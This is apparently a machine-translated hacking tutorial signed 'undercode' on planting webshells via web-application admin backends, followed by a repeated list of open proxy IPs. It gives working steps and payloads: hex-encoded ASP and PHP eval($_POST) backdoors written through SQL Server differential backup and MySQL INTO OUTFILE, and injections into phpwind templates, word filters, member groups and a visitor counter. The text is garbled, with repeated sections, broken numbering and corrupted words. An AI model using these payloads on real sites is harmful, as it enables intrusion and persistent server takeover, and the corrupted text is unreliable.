9) In this code, 0x626273 is the hexadecimal of the library name bbs to be backed up, which can be other names such as bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E is the hexadecimal, which is the lp minimum horse; 0x643A5C7765625C312E617370 is d: \ web \ 1. asp hex, which is the webshell path you want to back up.
10) Of course, you can also use the more common backup method to obtain the webshell. The only shortcoming is that the backed up files are too large. If the backup database has a download-proof data table, or there is an incorrect asp code, the backed up webshell will not succeed. Running, using differential backup is a method with a high success rate, and greatly reduces the size of backup files.
11) Six, php + mysql system
The background needs to have mysql data query function, we can use it to execute SELECT ... INTO OUTFILE query output php file, because all the data is stored in mysql, so we can insert our webshell code into mysql by normal means Use the SELECT ... INTO OUTFILE statement to export the shell. Enter select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile 'path' in mysql operation to get a minimum horse
12) 0x3C3F6576616C 28245F504F53545B615D293B3F3E is our hexadecimal, this method is more common for phpmyadmin, first use the path of phpmyadmin to leak the vulnerability, the more typical one is http: //url/phpmyadmin/libra9xiaoes/select_lang.lib.php.
13) You can expose the path, it is easier to expose the absolute path in the php environment :). It is mentioned that when encountering mysql under the win system, the path should be written as d: \\ wwwroot \\ a.php. The following method is a more commonly used method of exporting webshell. You can also write a vbs script to add the system administrator to export to the startup folder. An administrator account will be added after the system restarts.
14) CREATE TABLE a (cmd text NOT NULL)
INSERT INTO a (cmd) VALUES ('")?>')
Select cmd from a into outfile 'path / b.php'
DROP TABLE IF EXISTS a
Accessing b.php will generate a minimum horse.
15) It is much simpler if you can execute the php command. The typical representative is BO-BLOG. Enter the following code in the php command box in the background:
$ sa = fopen ("./ up / saiy.php", "w");
fw9xiaote ($ sa, "");
fclose ($ sa);
?>
16) It will generate the smallest php Trojan with the content named saey.php in the up directory,
π¦Finally, use the lanker client to connect. In actual use, it is necessary to consider whether the folder has write permission. Or enter such a code ")?> Will generate a minimum horse of a.php in the current directory.
17) Three ways for the phpwind forum to go from the background to the webshell
Method 1 template method
18) Enter the background, set the style template, and write the code on a random line. Remember, this code must be written against the left line, and there can be no characters in front of the code.
EOT;
eval ($ a);
p9xiaont <<
19) Then get a shell for http: //website/bbs/index.php.
Founder 2 Swearing filtering method
π¦ The main code of differential backup:
8) declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x626273 backup database @a to disk = @
s--; Drop table [heige]; create table [dbo] dot [heige ] ([cmd] [image])-
; insert into heige (cmd) values ββ(0x3C2565786563757465207265717565737428226C2229253E)-
; declare at a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x643A5C7765625C312E617370 backup database @a to disk = @ s WITH DIFFERENTIAL, FORMAT--
9) In this code, 0x626273 is the hexadecimal of the library name bbs to be backed up, which can be other names such as bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E is the hexadecimal, which is the lp minimum horse; 0x643A5C7765625C312E617370 is d: \ web \ 1. asp hex, which is the webshell path you want to back up.
10) Of course, you can also use the more common backup method to obtain the webshell. The only shortcoming is that the backed up files are too large. If the backup database has a download-proof data table, or there is an incorrect asp code, the backed up webshell will not succeed. Running, using differential backup is a method with a high success rate, and greatly reduces the size of backup files.
11) Six, php + mysql system
The background needs to have mysql data query function, we can use it to execute SELECT ... INTO OUTFILE query output php file, because all the data is stored in mysql, so we can insert our webshell code into mysql by normal means Use the SELECT ... INTO OUTFILE statement to export the shell. Enter select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile 'path' in mysql operation to get a minimum horse
12) 0x3C3F6576616C 28245F504F53545B615D293B3F3E is our hexadecimal, this method is more common for phpmyadmin, first use the path of phpmyadmin to leak the vulnerability, the more typical one is http: //url/phpmyadmin/libra9xiaoes/select_lang.lib.php.
13) You can expose the path, it is easier to expose the absolute path in the php environment :). It is mentioned that when encountering mysql under the win system, the path should be written as d: \\ wwwroot \\ a.php. The following method is a more commonly used method of exporting webshell. You can also write a vbs script to add the system administrator to export to the startup folder. An administrator account will be added after the system restarts.
14) CREATE TABLE a (cmd text NOT NULL)
INSERT INTO a (cmd) VALUES ('")?>')
Select cmd from a into outfile 'path / b.php'
DROP TABLE IF EXISTS a
Accessing b.php will generate a minimum horse.
15) It is much simpler if you can execute the php command. The typical representative is BO-BLOG. Enter the following code in the php command box in the background:
$ sa = fopen ("./ up / saiy.php", "w");
fw9xiaote ($ sa, "");
fclose ($ sa);
?>
16) It will generate the smallest php Trojan with the content named saey.php in the up directory,
π¦Finally, use the lanker client to connect. In actual use, it is necessary to consider whether the folder has write permission. Or enter such a code ")?> Will generate a minimum horse of a.php in the current directory.
17) Three ways for the phpwind forum to go from the background to the webshell
Method 1 template method
18) Enter the background, set the style template, and write the code on a random line. Remember, this code must be written against the left line, and there can be no characters in front of the code.
EOT;
eval ($ a);
p9xiaont <<
19) Then get a shell for http: //website/bbs/index.php.
Founder 2 Swearing filtering method
Enter safety management β Bad word filtering. Add bad words to write a '] =' aa '; eval ($ _ POST [' a ']); //
20) Replace with where you can write at will, and then get a shell address http: //website/bbs/data/bbscache/wordsfb.php.
Method 3 User level management
Newly established member groups, you can write titles casually, but do nβt write special symbols with single or double quotation marks, write a '; eval ($ _ POST [' a ']); Then get a shell address http: //website/bbs/data/bbscache/level.php.
21) The above three ways to get webshellr's password is a, which is a backdoor server for Lanker.
> You can also use the website access counting system records to obtain webshell
22) The most obvious is the Ajiang counting program in a private server program, which can be directly submitted through http: //website/stat.asp? Style = text & referer = code content & screenwidth = 1024, you can insert the code content directly into the database of the counting system Medium, and the default database of this system is count # .asa,
23) we can access the webshell through http: //website/count%23.asa. Since the Ajiang counting program filters% and +, the minimum horse is changed to replace the code content Submit at the place, and then use the eval client of lake2 to submit. It is worth mentioning that if you enter the counting background, you can clean up the data at a certain moment. Once the insertion of the asp Trojan fails, you can clean up the database and operate again.
π¦solution
Because there are many versions of the code involved in this article, it is impossible to provide a perfect solution. Those who are capable can make appropriate repairs to the vulnerability file mentioned in this article. If the vulnerability file does not affect the use of the system, the file can also be deleted. If you don't fix it, you can download the latest patch from the relevant official website for repair and update. At the same time, please also pay attention to the latest announcements issued by major security networks, and notify the official website in time if you find related vulnerabilities.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
20) Replace with where you can write at will, and then get a shell address http: //website/bbs/data/bbscache/wordsfb.php.
Method 3 User level management
Newly established member groups, you can write titles casually, but do nβt write special symbols with single or double quotation marks, write a '; eval ($ _ POST [' a ']); Then get a shell address http: //website/bbs/data/bbscache/level.php.
21) The above three ways to get webshellr's password is a, which is a backdoor server for Lanker.
> You can also use the website access counting system records to obtain webshell
22) The most obvious is the Ajiang counting program in a private server program, which can be directly submitted through http: //website/stat.asp? Style = text & referer = code content & screenwidth = 1024, you can insert the code content directly into the database of the counting system Medium, and the default database of this system is count # .asa,
23) we can access the webshell through http: //website/count%23.asa. Since the Ajiang counting program filters% and +, the minimum horse is changed to replace the code content Submit at the place, and then use the eval client of lake2 to submit. It is worth mentioning that if you enter the counting background, you can clean up the data at a certain moment. Once the insertion of the asp Trojan fails, you can clean up the database and operate again.
π¦solution
Because there are many versions of the code involved in this article, it is impossible to provide a perfect solution. Those who are capable can make appropriate repairs to the vulnerability file mentioned in this article. If the vulnerability file does not affect the use of the system, the file can also be deleted. If you don't fix it, you can download the latest patch from the relevant official website for repair and update. At the same time, please also pay attention to the latest announcements issued by major security networks, and notify the official website in time if you find related vulnerabilities.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ELITE FRESH PROXIES
167.86.66.178 3128 1 hour ago
3347 ms 46% (51) de Germany - Nuremberg Elite -
79.137.123.252 3131 1 hour ago
1194 ms 11% (74) fr France Elite -
101.231.104.82 80 1 hour ago
1002 ms 70% (46) cn China - Shanghai Elite -
79.137.44.85 3129 1 hour ago
2617 ms 58% (50) es Spain - Madrid Elite -
103.216.82.200 6666 1 hour ago
3870 ms 12% (79) in India - Ahmedabad Elite -
103.216.82.216 6666 1 hour ago
3982 ms 10% (75) in India - Ahmedabad Elite -
108.74.113.180 80 1 hour ago
746 ms 48% (55) us United States - Atlanta Elite -
47.91.44.217 8000 1 hour ago
2133 ms 31% (52) au Australia - Melbourne Elite -
176.9.221.34 808 1 hour ago
2179 ms 19% (69) de Germany Elite -
177.91.111.233 8080 1 hour ago
3371 ms 17% (67) br Brazil - Bom Jesus da Lapa Elite -
185.72.27.12 8080 1 hour ago
3144 ms 9% (80) ir Iran Elite -
194.67.92.81 3128 1 hour ago
4208 ms 6% (85) ru Russia Elite -
118.24.89.206 1080 1 hour ago
3881 ms 9% (59) cn China Elite -
144.76.214.158 1080 1 hour ago
3052 ms 73% (43) de Germany Elite -
159.8.114.34 8123 1 hour ago
431 ms 92% (37) fr France - Clichy Elite -
140.227.174.216 1000 1 hour ago
2315 ms 12% (67) jp Japan Elite -
173.192.128.238 25 1 hour ago
153 ms 100% (33) us United States - Seattle Elite -
173.192.128.238 9999 1 hour ago
150 ms 100% (36) us United States - Seattle Elite -
64.227.126.95 3128 1 hour ago
1289 ms 22% (65) us United States - Jacksonville Elite -
62.213.14.166 8080 1 hour ago
3244 ms 25% (64) ru Russia - Samara Elite -
103.119.54.188 8888 1 hour ago
3221 ms 15% (74) cn China Elite -
103.216.82.28 6666 1 hour ago
3452 ms 8% (68) in India - Ahmedabad Elite -
213.6.136.150 8080 1 hour ago
3230 ms 17% (71) ps Palestinian Territories - Gaza Elite -
36.89.8.235 8080 1 hour ago
4558 ms 7% (78) id Indonesia Elite -
51.255.103.170 3129 1 hour ago
2916 ms 38% (70) gb United Kingdom Elite -
155.93.240.101 8080 1 hour ago
2217 ms 40% (46) za South Africa - Brackenfell Elite -
151.237.175.183 80 1 hour ago
4331 ms 24% (64) ru Russia - Novokuznetsk Elite -
178.128.211.134 6868 1 hour ago
1134 ms 65% (28) gr Greece Elite -
185.108.141.114 8080 1 hour ago
3630 ms 7% (79) bg Bulgaria Elite -
103.250.166.17 6666 1 hour ago
4328 ms 9% (78) in India - Gandhidham Elite -
103.247.216.114 8080 1 hour ago
3978 ms 11% (82) id Indonesia - Jakarta Elite -
122.226.57.70 8888 1 hour ago
942 ms 34% (51) cn China Elite -
113.254.134.196 8118 1 hour ago
835 ms 5% (71) hk Hong Kong - Central Elite -
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ELITE FRESH PROXIES
167.86.66.178 3128 1 hour ago
3347 ms 46% (51) de Germany - Nuremberg Elite -
79.137.123.252 3131 1 hour ago
1194 ms 11% (74) fr France Elite -
101.231.104.82 80 1 hour ago
1002 ms 70% (46) cn China - Shanghai Elite -
79.137.44.85 3129 1 hour ago
2617 ms 58% (50) es Spain - Madrid Elite -
103.216.82.200 6666 1 hour ago
3870 ms 12% (79) in India - Ahmedabad Elite -
103.216.82.216 6666 1 hour ago
3982 ms 10% (75) in India - Ahmedabad Elite -
108.74.113.180 80 1 hour ago
746 ms 48% (55) us United States - Atlanta Elite -
47.91.44.217 8000 1 hour ago
2133 ms 31% (52) au Australia - Melbourne Elite -
176.9.221.34 808 1 hour ago
2179 ms 19% (69) de Germany Elite -
177.91.111.233 8080 1 hour ago
3371 ms 17% (67) br Brazil - Bom Jesus da Lapa Elite -
185.72.27.12 8080 1 hour ago
3144 ms 9% (80) ir Iran Elite -
194.67.92.81 3128 1 hour ago
4208 ms 6% (85) ru Russia Elite -
118.24.89.206 1080 1 hour ago
3881 ms 9% (59) cn China Elite -
144.76.214.158 1080 1 hour ago
3052 ms 73% (43) de Germany Elite -
159.8.114.34 8123 1 hour ago
431 ms 92% (37) fr France - Clichy Elite -
140.227.174.216 1000 1 hour ago
2315 ms 12% (67) jp Japan Elite -
173.192.128.238 25 1 hour ago
153 ms 100% (33) us United States - Seattle Elite -
173.192.128.238 9999 1 hour ago
150 ms 100% (36) us United States - Seattle Elite -
64.227.126.95 3128 1 hour ago
1289 ms 22% (65) us United States - Jacksonville Elite -
62.213.14.166 8080 1 hour ago
3244 ms 25% (64) ru Russia - Samara Elite -
103.119.54.188 8888 1 hour ago
3221 ms 15% (74) cn China Elite -
103.216.82.28 6666 1 hour ago
3452 ms 8% (68) in India - Ahmedabad Elite -
213.6.136.150 8080 1 hour ago
3230 ms 17% (71) ps Palestinian Territories - Gaza Elite -
36.89.8.235 8080 1 hour ago
4558 ms 7% (78) id Indonesia Elite -
51.255.103.170 3129 1 hour ago
2916 ms 38% (70) gb United Kingdom Elite -
155.93.240.101 8080 1 hour ago
2217 ms 40% (46) za South Africa - Brackenfell Elite -
151.237.175.183 80 1 hour ago
4331 ms 24% (64) ru Russia - Novokuznetsk Elite -
178.128.211.134 6868 1 hour ago
1134 ms 65% (28) gr Greece Elite -
185.108.141.114 8080 1 hour ago
3630 ms 7% (79) bg Bulgaria Elite -
103.250.166.17 6666 1 hour ago
4328 ms 9% (78) in India - Gandhidham Elite -
103.247.216.114 8080 1 hour ago
3978 ms 11% (82) id Indonesia - Jakarta Elite -
122.226.57.70 8888 1 hour ago
942 ms 34% (51) cn China Elite -
113.254.134.196 8118 1 hour ago
835 ms 5% (71) hk Hong Kong - Central Elite -
β β β ο½ππ»βΊπ«Δπ¬πβ β β β